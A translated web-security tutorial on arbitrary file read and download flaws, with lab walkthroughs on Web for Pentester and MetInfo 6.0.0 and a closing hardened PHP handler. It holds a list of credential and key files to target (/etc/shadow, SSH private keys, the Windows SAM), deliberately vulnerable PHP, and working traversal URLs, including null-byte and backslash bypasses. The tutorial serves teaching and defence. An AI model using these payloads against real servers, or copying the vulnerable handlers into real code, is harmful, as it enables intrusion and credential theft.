[Red Security] Web Security Day 9 - File download vulnerability in practice

This article was written by a member of Red Security. If anything in it is inappropriate, please point it out.

Hello everyone, we are the Red Security Web security group. This project is a series of articles sharing Web security knowledge, and it also contains practice labs for you to exercise on. We have named the project Web Security in Practice and hope it helps friends who want to learn Web security. Each article follows the structure: vulnerability introduction - vulnerability principle - vulnerability harm - test methods (manual testing and test tools) - test lab (PHP, Java and Python labs, covering basically all three kinds) - real-world walkthrough (mainly a suitable CMS or a Vulnhub exercise). If you like it, please give us a Star to encourage us to write better articles. If you would like to join us and improve this project together, please contact us by e-mail ([email protected]).

1.1 Introduction to arbitrary file read/download vulnerabilities

Because of business needs, some sites provide file viewing or downloading. If the files a user is allowed to view or download are not restricted, a malicious user can view or download arbitrary files, including source code files and sensitive files.

1.2 Harm of arbitrary file read/download vulnerabilities

An attacker can read or download server configuration files and other sensitive files, which provides the attacker with more information and raises the risk of the server being compromised.

1.3 Conditions for exploiting arbitrary file read/download

  1. There is a function that reads a file

  2. The path of the file being read is controlled by the user and is not checked, or is checked loosely

  3. The file contents are output

2. Testing arbitrary file read/download vulnerabilities

2.1 Test ideas

  1. Look for function points that read or download files, and use directory traversal to access sensitive files

  2. Some directory restrictions are not strict and only cover part of the directories, so other sensitive file paths can be tried; common sensitive file paths are as follows:

    Windows:
    C:\boot.ini                                  // check the system version
    C:\Windows\System32\inetsrv\MetaBase.xml     // IIS configuration file
    C:\Windows\repair\sam                        // stores the password set when the system was first installed
    C:\Program Files\mysql\my.ini                // MySQL configuration
    C:\Program Files\mysql\data\mysql\user.MYD   // MySQL root
    C:\Windows\php.ini                           // PHP configuration information
    C:\Windows\my.ini                            // MySQL configuration information
    ...
    Linux:
    /root/.ssh/authorized_keys
    /root/.ssh/id_rsa
    /root/.ssh/id_rsa.keystore
    /root/.ssh/known_hosts
    /etc/passwd
    /etc/shadow
    /etc/my.cnf
    /etc/httpd/conf/httpd.conf
    /root/.bash_history
    /root/.mysql_history
    /proc/self/fd/fd[0-9]*                       // file descriptors
    /proc/mounts
    /proc/config.gz

2.2 Target machine test

Here we use Web for Pentester as the test target.

2.2.1 Installation steps

Download address: https://download.vulnhub.com/pentesterlab/web_for_pentester_i386.iso
We only need to install the VMware image to use it: create a new virtual machine, keep the defaults and click Next, select the image file, set the virtual machine name and storage location, keep the default disk size, and power on the virtual machine. Check its IP address to confirm that the build succeeded. Here we demonstrate with the Directory traversal exercises.

2.2.2 Example 1

As the code shows, there is no restriction at all; the file is read directly:

<?php
// Example 1 from Web for Pentester (vulnerable on purpose): the user-supplied
// file name is appended to the upload directory without any checks.
$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
    die();

$file = $_GET['file'];

// "../" sequences in $file are kept, so the resulting path can leave $UploadDir
$path = $UploadDir . $file;

if (!is_file($path))
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

// stream the file back in 8 KiB chunks
$handle = fopen($path, 'rb');

do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);

fclose($handle);
exit();

Use ../ to traverse directories and read sensitive files; here we read the passwd file:
http://192.168.163.141/dirtrav/example1.php?file=../../../etc/passwd

2.2.3 Example 2

As the code shows, the path must contain /var/www/files/:

<?php
// Example 2 from Web for Pentester (vulnerable on purpose): the check only
// requires the allowed directory to appear somewhere in the path.
if (!(isset($_GET['file'])))
    die();

$file = $_GET['file'];

// strstr() only tests that "/var/www/files/" occurs in $file; a path that
// starts there and then climbs out again with "../" still passes
if (!(strstr($file,"/var/www/files/")))
    die();

if (!is_file($file))
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));

// stream the file back in 8 KiB chunks
$handle = fopen($file, 'rb');

do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);

fclose($handle);
exit();

http://192.168.163.141/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

2.2.4 Example 3

As the code shows, the null byte and all characters after it are stripped:

<?php
// Example 3 from Web for Pentester (vulnerable on purpose): a ".png" extension
// is appended, but the path is truncated at the first null byte.
$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
    die();

$file = $_GET['file'];

// Only .png files under $UploadDir are meant to be readable
$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP:
// everything from the first \x00 onward, including the appended ".png", is dropped
$path = preg_replace('/\x00.*/',"",$path);

if (!is_file($path))
    die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

// stream the file back in 8 KiB chunks
$handle = fopen($path, 'rb');

do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
        break;
    }
    echo($data);
} while (true);

fclose($handle);
exit();

http://192.168.163.141/dirtrav/example3.php?file=../../../etc/passwd%00

2.3 CMS practical exercise

Here MetInfo CMS is chosen to demonstrate the arbitrary file read vulnerability.

2.3.1 Installation steps

Download address: https://www.metinfo.cn/upload/file/MetInfo6.0.0.zip
Vulnerability environment: phpstudy, Windows
Vulnerability present: arbitrary file read
After unzipping, install by clicking Next through the steps and configure the database and administrator information.
Installation complete.

2.3.2 Exploitation process

The vulnerable point is: MetInfo6.0.0/include/thumb.php?dir=
Location of the vulnerable code: MetInfo6.0.0\app\system\include\module\old_thumb.class.php
There are two filters. The first strips ../ and ./ from the path; the second requires the path to contain http and not contain ./:

// First filter: strip "../" and "./" from the dir parameter. Only the
// forward-slash forms are removed, so "..\" is left untouched.
$dir = str_replace(array('../','./'), '', $_GET['dir']);

// Second filter: after removing the site URL, the path must start with "http"
// and must not contain "./". $_M is MetInfo's global configuration array.
if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
    header("Content-type: image/jpeg");
    ob_start();
    readfile($dir);   // the filtered path is read and returned directly
    ob_flush();
    flush();
    die;
}

On Windows, ..\ can be used to bypass the filter:
http://127.0.0.1/MetInfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php

3. Vulnerability fix

1. Filter ./, ../, ..\ and %
2. Strictly control the file paths that can be read or downloaded
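As an added example that is not code from the original article, from Web for Pentester or from MetInfo, here is a hardened version of the download handler from examples 1 to 3. It replaces the blacklist approach with canonicalisation and a directory prefix check, which blocks all of the bypasses shown above (../, the /var/www/files/ substring trick, the %00 truncation and ..\ on Windows). The base directory /var/www/files/ is taken from the examples; the function name is hypothetical.

```php
<?php
// Added example, not code from the original article: a hardened download
// handler. Instead of blacklisting "../", it canonicalises the requested path
// with realpath() and checks that the result still lies inside the base directory.

// Return the canonical path of $file inside $baseDir, or null when the request
// must be refused. The function name is hypothetical.
function resolve_download_path(string $baseDir, string $file): ?string
{
    // Reject embedded NUL bytes outright instead of truncating at them (example 3).
    if (strpos($file, "\0") !== false) {
        return null;
    }
    // Canonicalise the allowed directory; realpath() also resolves symlinks.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Canonicalise the user-supplied path relative to the base directory.
    // realpath() collapses "../" and, on Windows, "..\" segments (examples 1 and 2,
    // and the MetInfo case) and returns false for files that do not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Compare canonical paths, not the raw input, so the substring check of
    // example 2 cannot be fooled. The trailing separator stops a sibling
    // directory such as "/var/www/files2" from passing for "/var/www/files".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$UploadDir = '/var/www/files/';   // base directory from the examples above
if (!isset($_GET['file'])) {
    http_response_code(400);
    exit;
}
$path = resolve_download_path($UploadDir, $_GET['file']);
if ($path === null) {
    http_response_code(404);      // same answer for missing and forbidden files
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

Because realpath() requires the file to exist, a missing file and a file outside the directory both end in the same 404, which avoids revealing which paths exist on the server.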




Origin: blog.51cto.com/14697379/2474554